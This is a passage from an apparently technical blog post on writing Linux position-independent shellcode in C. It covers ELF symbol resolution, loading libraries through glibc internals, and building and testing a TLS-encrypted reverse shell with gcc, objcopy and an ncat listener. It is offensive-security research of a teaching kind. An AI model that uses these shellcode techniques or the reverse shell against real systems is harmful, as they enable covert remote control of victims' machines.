        const uint32_t hash = chain[symix - symoffset];        
        if (namehash|1 == hash|1 && _strcmp(name, symname) == 0) {
            return (void*)symtab[symix].st_value;
        }
        if(hash & 1) break;
        symix++;
    }
    return 0;
}

7.3 Dynamic Symbol Table (DT_SYMTAB, DT_DYNSYM)

The following function works similar to GetProcAddress on Windows and dlsym on Linux. Given a base address and name of function, lookup the virtual address of function using the hash table.

void *get_proc_address(void *module, void *name) {
    Elf64_Dyn  *symtab, *strtab, *hash;
    Elf64_Sym  *syms;
    char       *strs;
    void       *addr = NULL;
    
    // 1. obtain pointers to string and symbol tables
    strtab = elf_get_dyn(module, DT_STRTAB);
    symtab = elf_get_dyn(module, DT_SYMTAB);
    
    if(strtab == NULL || symtab == NULL) return NULL;
    
    // 2. load virtual address of string and symbol tables
    strs = (char*)strtab->d_un.d_ptr;
    syms = (Elf64_Sym*)symtab->d_un.d_ptr;
    
    // 3. try obtain the ELF hash table
    hash = elf_get_dyn(module, DT_HASH);
    
    // 4. if we have it, lookup symbol by ELF hash
    if(hash != NULL) {
      addr = elf_lookup(name, (void*)hash->d_un.d_ptr, syms, strs);
    } else {
      // if we don't, try obtain the GNU hash table
      hash = elf_get_dyn(module, DT_GNU_HASH);
      if(hash != NULL) {
        addr = gnu_lookup(name, (void*)hash->d_un.d_ptr, syms, strs);
      }
    }
    // 5. did we find symbol? add base address and return
    if(addr != NULL) {
      addr = (void*)((uint64_t)module + addr);
    }
    return addr;
}

This approach requires using the hash table, but in the next example, I’ll show a method similar to what’s used in Windows shellcode.

7.4 Using Hash Algorithm (SHT_SYMTAB, SHT_DYNSYM)

Another way to lookup the address of a function that is by using the section headers. get_proc_address2 given the base of a module will obtain the path of library and pass it to get_proc_address3 that will then search the symbol table using a hash of the function name. get_proc_address3 is primarily for statically linked binaries.

// lookup by hash using the base address of module
void *get_proc_address2(void *module, uint32_t hash) {
    char            *path=NULL;
    Elf64_Phdr      *phdr;
    Elf64_Dyn       *got;
    uint64_t        *ptrs, addr;
    struct link_map *map;
    
    if(module == NULL) return NULL;
    
    // 1. obtain pointer to dynamic program header
    phdr = (Elf64_Phdr*)elf_get_phdr(module, PT_DYNAMIC);
    
    if(phdr != NULL) {
      // 2. obtain global offset table
      got = elf_get_dyn(module, DT_PLTGOT);
      if(got != NULL) {
        ptrs = (uint64_t*)got->d_un.d_ptr;
        map   = (struct link_map *)ptrs[1];
        // 3. search through link_map for module
        while (map != NULL) {
          // this our module?
          if(map->l_addr == (uint64_t)module) {
            path = map->l_name;
            break;
          }
          map = (struct link_map *)map->l_next;
        }
      }
    }
    // not found? exit
    if(path == NULL) return NULL;
    addr = (uint64_t)get_proc_address3(path, hash);
    
    return (void*)((uint64_t)module + addr); 
}

// lookup by hash using the path of library (static lookup)
void* get_proc_address3(const char *path, uint32_t hash) {
    int         i, fd, cnt=0;
    Elf64_Ehdr *ehdr;
    Elf64_Phdr *phdr;
    Elf64_Shdr *shdr;
    Elf64_Sym  *syms=0;
    void       *addr=NULL;
    char       *strs=0;
    uint8_t    *map;
    struct stat fs;
    int         str[8];
    
    // /proc/self/exe
    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x652f666c;
    str[3] = 0x00006578;

    // open file
    fd = _open(path == NULL ? (char*)str : path, O_RDONLY, 0);
    if(fd == 0) return NULL;
    // get the size
    if(_fstat(fd, &fs) == 0) {
      // map into memory
      map = (uint8_t*)_mmap(NULL, fs.st_size,  
        PROT_READ, MAP_PRIVATE, fd, 0);
      if(map != NULL) {
        ehdr = (Elf64_Ehdr*)map;
        shdr = (Elf64_Shdr*)(map + ehdr->e_shoff);
        // locate static or dynamic symbol table
        for(i=0; i<ehdr->e_shnum; i++) {
          if(shdr[i].sh_type == SHT_SYMTAB ||
             shdr[i].sh_type == SHT_DYNSYM) {
            strs = (char*)(map + shdr[shdr[i].sh_link].sh_offset);
            syms = (Elf64_Sym*)(map + shdr[i].sh_offset);
            cnt  = shdr[i].sh_size/sizeof(Elf64_Sym);
          }
        }
        // loop through string table for function
        for(i=0; i<cnt; i++) {
          // if found, save address
          if(gnu_hash(&strs[syms[i].st_name]) == hash) {
            addr = (void*)syms[i].st_value;
          }
        }
        _munmap(map, fs.st_size);
      }
    }
    _close(fd);
    return addr;
}

8. Loading Shared Objects

The normal way to load a shared object and resolve the address of a function is via dlopen and dlsym respectively. Both of these functions are exported by libdl.so – the dynamic linking library. For my build of Debian, libc.so doesn’t use code inside libdl.so because the mechanics of loading libraries and resolving functions are actually within ld.so – the dynamic linker/loader. This loader also doesn’t export or make publicly available either of the functions required, but pointers to the real functions can be found in a read-only shared area of memory called _rtld_global_ro that is exposed via the symbol table. This is a structure defined in /sysdeps/generic/ldsodefs.h that when compiled with SHARED defined will include pointers to the dynamic loading functions.

8.1 __libc_dlopen_mode and __libc_dlsym

Before discussing anything about _rtld_global_ro, you can find functions in the symbol table of libc.so that allow you to dynamically load shared objects without using libdl.so

user@nostromo:~/hub/shellcode$ readelf /lib/x86_64-linux-gnu/libc-2.24.so -s |grep -i "__libc_dl"
  1165: 000000000011fa60    17 FUNC    GLOBAL DEFAULT   13 __libc_dl_error_tsd@@GLIBC_PRIVATE
  1216: 000000000011f4b0    35 FUNC    GLOBAL DEFAULT   13 __libc_dlclose@@GLIBC_PRIVATE
  2043: 000000000011f440   100 FUNC    GLOBAL DEFAULT   13 __libc_dlsym@@GLIBC_PRIVATE
  2152: 000000000011f3f0    80 FUNC    GLOBAL DEFAULT   13 __libc_dlopen_mode@@GLIBC_PRIVATE

To load libraries, we need to resolve the address of __libc_dlopen_mode and if we want to resolve the address of functions by string, we also need __libc_dlsym. The following code shows how you might load libgnutls.so using a static path.

  void *clib, *gnutls;
  
  // 1. resolve the address of _dl_addr in libc.so
  clib = get_module_handle("libc");
  _dl_open = (dl_open_t)get_proc_address(clib, "__libc_dlopen_mode");
  
  // 2. load gnutls
  gnutls = _dl_open("/usr/lib/x86_64-linux-gnu/libgnutls.so", RTLD_LAZY);

Now onto the _rtld_global_ro object that may be of interest to you. The following shows the function pointers for dynamic loading. Depending on the version of glibc, the structure itself can differ in size. I was curious to see if it was possible to find _dl_open using this object in the event __libc_dlopen_mode was not available for any reason.

user@nostromo:~/hub/shellcode$ readelf -s /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 |grep -i "rtld_global_ro"
    25: 0000000000223ca0   376 OBJECT  GLOBAL DEFAULT   16 _rtld_global_ro@@GLIBC_PRIVATE
#ifdef SHARED
  // We add a function table to _rtld_global which is then used to
  //   call the function instead of going through the PLT.  The result
  //   is that we can avoid exporting the functions and we do not jump
  //   PLT relocations in libc.so.
  
  void (*_dl_debug_printf) (const char *, ...)
       __attribute__ ((__format__ (__printf__, 1, 2)));
  
  int (internal_function *_dl_catch_error) (const char **, const char **,
					    bool *, void (*) (void *), void *);
  
  void (internal_function *_dl_signal_error) (int, const char *, const char *,
					      const char *);
  
  void (*_dl_mcount) (ElfW(Addr) frompc, ElfW(Addr) selfpc);
  
  lookup_t (internal_function *_dl_lookup_symbol_x) (const char *,
						     struct link_map *,
						     const ElfW(Sym) **,
						     struct r_scope_elem *[],
						     const struct r_found_version *,
						     int, int,
						     struct link_map *);
                 
  int (*_dl_check_caller) (const void *, enum allowmask);
  
  void *(*_dl_open) (const char *file, int mode, const void *caller_dlopen,
		     Lmid_t nsid, int argc, char *argv[], char *env[]);
  
  void (*_dl_close) (void *map);
  
  void *(*_dl_tls_get_addr_soft) (struct link_map *);
  
#ifdef HAVE_DL_DISCOVER_OSVERSION
  int (*_dl_discover_osversion) (void);
#endif

You can view the data for a process under GDB if you know the address of _rtld_global_ro.

(gdb) x/40xg 0x7ffff7ffcca0
0x7ffff7ffcca0 <_rtld_global_ro>:     0x0004099000000000  0x00007fffffffe4d9
0x7ffff7ffccb0 <_rtld_global_ro+16>:  0x0000000000000006  0x0000000000001000
0x7ffff7ffccc0 <_rtld_global_ro+32>:  0x0000000000000000  0x00007ffff7fcca30
0x7ffff7ffccd0 <_rtld_global_ro+48>:  0x0000000000000004  0x0000000000000064
0x7ffff7ffcce0 <_rtld_global_ro+64>:  0x0000000100000002  0x0000000000000000
0x7ffff7ffccf0 <_rtld_global_ro+80>:  0x000003030000037f  0x00000000bfebfbff
0x7ffff7ffcd00 <_rtld_global_ro+96>:  0x0000000000000000  0x00007fffffffe390
0x7ffff7ffcd10 <_rtld_global_ro+112>: 0x0000001600000001  0x02100800000406e3
0x7ffff7ffcd20 <_rtld_global_ro+128>: 0xbfebfbff7ffafbbf  0x029c67af00000000
0x7ffff7ffcd30 <_rtld_global_ro+144>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd40 <_rtld_global_ro+160>: 0x0000000000000000  0x0000004e00000006
0x7ffff7ffcd50 <_rtld_global_ro+176>: 0x00000000000003c0  0x000000000034ccf1
0x7ffff7ffcd60 <_rtld_global_ro+192>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd70 <_rtld_global_ro+208>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd80 <_rtld_global_ro+224>: 0x00007ffff7df503c  0x0000000000000000
0x7ffff7ffcd90 <_rtld_global_ro+240>: 0x0000000000000000  0x00007ffff7ffec28
0x7ffff7ffcda0 <_rtld_global_ro+256>: 0x00007ffff7ffa000  0x00007ffff7ffe708
0x7ffff7ffcdb0 <_rtld_global_ro+272>: 0x0000000000000000  0x00007ffff7de9630
0x7ffff7ffcdc0 <_rtld_global_ro+288>: 0x00007ffff7de85d0  0x00007ffff7de8390
0x7ffff7ffcdd0 <_rtld_global_ro+304>: 0x00007ffff7deaa30  0x00007ffff7de2ea0

Using some simple code, we can identify with _dl_addr the addresses that belong to ld-linux.

typedef struct {
  const char *dli_fname;  // File name of defining object.   
  void       *dli_fbase;  // Load address of that object.    
  const char *dli_sname;  // Name of nearest symbol.         
  void       *dli_saddr;  // Exact value of nearest symbol.  
} Dl_info;

typedef int (*dl_addr_t)(
  const void *address, 
  Dl_info *info, 
  struct link_map **mapp, 
  const Elf64_Sym **symbolp);
  
  -------------------------------
    dl_addr_t _dl_addr;
    void      *clib, *ld;
    uint64_t  *rtld;
    DL_info   info;
    
    // 1. resolve the address of _dl_addr in libc.so
    clib = get_module_handle("libc");
    _dl_addr = (dl_addr_t)get_proc_address(clib, "_dl_addr");
    
    // 2. resolve the address of _rtld_global_ro in ld-linux.so
    ld = get_module_handle("ld-linux");
    rtld = (uint64_t*)get_proc_address(ld, "_rtld_global_ro");
    
    // 3. try the first 64 entries
    for(i=0;i<64;i++) {
      if(_dl_addr((void*)rtld[i], &info, &map, &sym)) {
        const char *str = info.dli_sname ? : "N/A";
        printf("[%i] %p : %-10s : %s \n", 
          i, rtld[i], str, info.dli_fname);
      }
    }

Below shows basic output using the above code.

[28] 0x7f5dde45c03c : N/A        : /lib64/ld-linux-x86-64.so.2 
[32] 0x7ffd6d904000 : LINUX_2.6  : linux-vdso.so.1 
[35] 0x7f5dde450630 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_printf 
[36] 0x7f5dde44f5d0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_catch_error
[37] 0x7f5dde44f390 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_signal_error
[38] 0x7f5dde451a30 : _dl_mcount : /lib64/ld-linux-x86-64.so.2  // _dl_mcount
[39] 0x7f5dde449ea0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_lookup_symbol_x
[40] 0x7f5dde452fc0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_check_caller
[41] 0x7f5dde453540 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_open
[42] 0x7f5dde455560 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_close
[43] 0x7f5dde452b40 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_tls_get_addr_soft
[44] 0x7f5dde457b80 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_discover_osversion

In this instance, we know the address of _dl_open will be at _rtld_global_ro + 41*8. It’s certainly possible to call the function, but internally is a check for where the call originated from. dl_check_caller will determine if the call originated from a valid Dynamic Shared Object (DSO).

// Bit masks for the objects which valid callers can come from to
//   functions with restricted interface.  
enum allowmask {
    allow_libc = 1,
    allow_libdl = 2,
    allow_libpthread = 4,
    allow_ldso = 8
  };

The following is a snippet of the code to validate a caller from elf/dl-caller.c.

static void dl_open_worker (void *a) {
  struct dl_open_args *args = a;
  const char *file = args->file;
  int mode = args->mode;
  struct link_map *call_map = NULL;

  // Check whether _dl_open() has been called from a valid DSO.
  if (__check_caller (args->caller_dl_open,
		      allow_libc|allow_libdl|allow_ldso) != 0)
    _dl_signal_error (0, "dlopen", NULL, N_("invalid caller"));

As you can see, only libc.so, libdl.so and ld.so are permitted to load a library. Bypassing this check is trivial, but thankfully not required because libc.so exports __libc_dlopen_mode

8.2 Parsing /etc/ld.so.conf

A list of shared libraries are stored in /etc/ld.so.cache and a list of trusted paths can be found in /etc/ld.so.conf. If you wanted to map a library into memory without knowing the full path, one way would be checking each of the entries in cache or by appending the name of a library to each of the paths found in the configuration file. For this shellcode, all libraries required are stored in the cache list and dlopen doesn’t require a full path.

9. Reverse Shell using SSL/TLS

The reverse shell uses synchronization so that it’s possible to create a sub process running /bin/sh with stdin,stdout and stderr being redirected through anonymous pipes. We then monitor I/O signals on those anonymous pipes and a TCP socket. This allows us to encrypt/decrypt using the GNU TLS functions. It is based on epl.c that does not use any encryption for interacting with /bin/sh.

9.1 Data Table

Since we can’t use any global variables for a PIC, everything is stored on the stack. To manage this data more efficiently, I’ve defined a structure that contains all the pointers to functions and variables for various operations should it be required by other subroutines.

typedef struct _data_t {
    int s;       // socket file descriptor

    union {
      uint64_t hash[64];
      void     *addr[64];
      struct {
        // gnu c library functions
        pipe_t          _pipe;
        fork_t          _fork;
        socket_t        _socket;
        // .... snipped
      };
    } api;
} data_t;

9.2 Strings

Declaring strings is a slight problem for a shellcode because gcc will move them all to a read-only segment (.rodata) that is separate from the (.text) segment. There are a few ways to work around this. elfmaster suggests using the -N option of the linker ld to combine all segments into one. fishstiqz uses a combination of macros and inline assembly. What I do is declare an array of integers large enough to hold the string. That array is then initialized using the string converted to integers. gcc should do this automatically, but it’s currently not an option. The following code demonstrates the idea where len is initialized to the length of string and str is an empty array of integers. i.e int str[16];

    int *str;
    
    len = strlen(input);
    str = (int*)input;
    
    // align up by 4
    len = (len & -4) + 4;
    len >>= 2;
    
    for(i=0;i<len;i++) {
      printf("str[%i] = 0x%08lx;\n", i, str[i]);
    }

As an example, the string “/proc/self/maps” becomes:

    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x6d2f666c;
    str[3] = 0x00737061;
    str[4] = 0;

One might also consider storing all strings in a separate block of data that is then simply passed to each subroutine as a parameter.

9.3 Compiling

A Makefile is provided to compile and extract the shellcode automatically. It uses gcc to compile and objcopy to extract. xxd then converts the binary in tls.bin to a C style string and redirects output to tls.h. Don’t forget that tls.c uses port 1234 and 127.0.0.1 as the peer address because it’s only a proof of concept.

  gcc -O0 -nostdlib -fpic tls.c -o tls
  objcopy -O binary --only-section=.text tls tls.bin
  xxd -i tls.bin > tls.h

The gcc option -O0 implies disabling optimizations. -nostdlib implies not using any standard library functions and -fpic implies generating position-independent code. Objcopy simply extracts the executable code stored in the .text segment.

9.4 Testing

ncat, that comes bundled with nmap supports raw I/O using TLS/SSL. The following will listen for incoming SSL/TLS connections on port 1234 using any ipv4 interface.

  ncat -lvk4 1234 --ssl

runsc.c can be used to execute the code from memory.

  runsc -x -f tls.bin

10. Summary

As you can see, it’s entirely possible to avoid using pure assembly code for a PIC. Admittedly, some assembly is used here to workaround limitations of C itself, but would be completely avoidable if the C code was supplied with a valid address of the host process, libc.so or any other shared object. Sources can be found here.

This entry was posted in assembly, linux, shellcode and tagged , , , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s